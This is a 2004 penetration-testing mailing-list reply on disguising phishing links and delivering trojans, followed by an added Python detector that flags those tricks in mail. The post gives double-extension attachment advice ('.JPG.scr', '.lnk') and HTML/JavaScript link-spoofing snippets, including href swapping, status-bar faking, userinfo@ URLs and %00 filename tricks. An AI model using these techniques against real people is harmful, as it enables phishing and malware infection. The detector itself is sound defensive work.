Penetration Testing mailing list archives
Re: Social Engineering Website (URL obfuscation/hiding)
From: Martin Mačok <martin.macok () underground cz>
Date: Sat, 10 Jan 2004 08:59:16 +0100
On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:
> As a last note, we'd need to get people to go there. Making it look legit would be good. (i.e. use the %00 IE exploit to make the URL look like it's internal and make the site look like their own) Any techniques or message styles you've used and had success with?
- send the trojan code in an email attachment with a good old something.JPG.scr trick (if you can go to them, they don't have to go to you)
- some content filters disallow .scr, so try .lnk also
- send a link to the trojan file; in a typical MS Outlook environment, they just have to click on it and select "Open"
- use a unique URL/file for each target (so you can track downloads and email forwards)

URL obfuscation/hiding:

    <script language="JavaScript">
    <!--
    function changehref() {
        document.all("obj").href = "http://www.fakesite.com";
        return 1;
    }
    //-->
    </script>

    [snip]

    <a href="http://www.realsite.com/" id="obj" onclick="changehref();">www.fakesite.com</a>

Similar trick:

    <a href="http://www.realsite.com" onmouseover="window.status=('http://www.fakesite.com/'); return true;">www.fakesite.com</a>

Some more recent SCAM trick:

    <a href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">www.fakesite.com</a>

Other MS IE trick (browser believes it's HTML instead of an EXE):

    http://server/file.exe?.html

As you mention, MS IE's (and possibly some other browsers') %00 trick:

    README.TXT%00PROG.EXE in Content-disposition:

(there are many different tricks with %00)

See also:
http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
http://www.solutions.fi/iebug2

-- 
Martin Mačok
http://underground.cz/
martin.macok () underground cz
http://Xtrmntr.org/ORBman/
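A mail-gateway check for the link and attachment tricks listed in the post, written from the filtering side; this is an added example, not code from the post or from the list. It uses only the Python standard library; AnchorAuditor, audit_url, audit_filename and SAMPLE are names chosen here, and SAMPLE is a constructed mail body that reuses the post's own link forms.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit
import re

HOST_RE = re.compile(r"^(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}(?:/\S*)?$", re.I)  # text that looks like a host/URL
EXEC_EXT = (".exe", ".scr", ".lnk", ".pif", ".bat", ".com")

def audit_url(url):
    out, p = [], urlsplit(url)
    if "@" in p.netloc:  # http://www.fakesite.com:something_ugly_long@www.realsite.com/
        out.append("userinfo before real host %s" % p.hostname)
    if p.path.lower().endswith(EXEC_EXT) and (p.query or p.fragment):
        out.append("executable masked by query/fragment")  # http://server/file.exe?.html
    return out

def audit_filename(name):  # attachment name or Content-Disposition filename
    out = ["NUL byte in filename"] if "\x00" in name or "%00" in name else []  # README.TXT%00PROG.EXE
    if name.lower().endswith(EXEC_EXT) and name.count(".") > 1:
        out.append("double extension hides executable")  # something.JPG.scr
    return out

class AnchorAuditor(HTMLParser):
    """feed() an HTML mail body; .findings lists (href, [problems]) for every suspicious link."""
    def __init__(self):
        super().__init__()
        self.findings, self._a, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a" and dict(attrs).get("href"):
            self._a, self._text = dict(attrs), []
    def handle_data(self, data):
        if self._a is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag != "a" or self._a is None:
            return
        href, text = self._a["href"], "".join(self._text).strip()
        found = audit_url(href)
        if HOST_RE.match(text):  # visible text claims a host: compare it with the real one
            shown = urlsplit(text if "://" in text else "http://" + text).hostname
            if shown != urlsplit(href).hostname:
                found.append("text shows %s, href goes to %s" % (shown, urlsplit(href).hostname))
        found += ["%s handler on link" % k for k in self._a if k.startswith("on")]  # rewrites href/status bar
        if found:
            self.findings.append((href, found))
        self._a = None

SAMPLE = """<a href="http://www.realsite.com/" id="obj" onclick="changehref();">www.fakesite.com</a>
<a href="http://www.realsite.com" onmouseover="window.status=('http://www.fakesite.com/'); return true;">www.fakesite.com</a>
<a href="http://www.fakesite.com:something_ugly_long@www.realsite.com/"> www.fakesite.com</a>
<a href="http://server/file.exe?.html">quarterly report</a>"""  # constructed from the post's tricks, not a real mail
```

Feed SAMPLE to an AnchorAuditor and read .findings: all four links are reported, while a link whose visible text and href name the same host and that carries no event handler produces nothing.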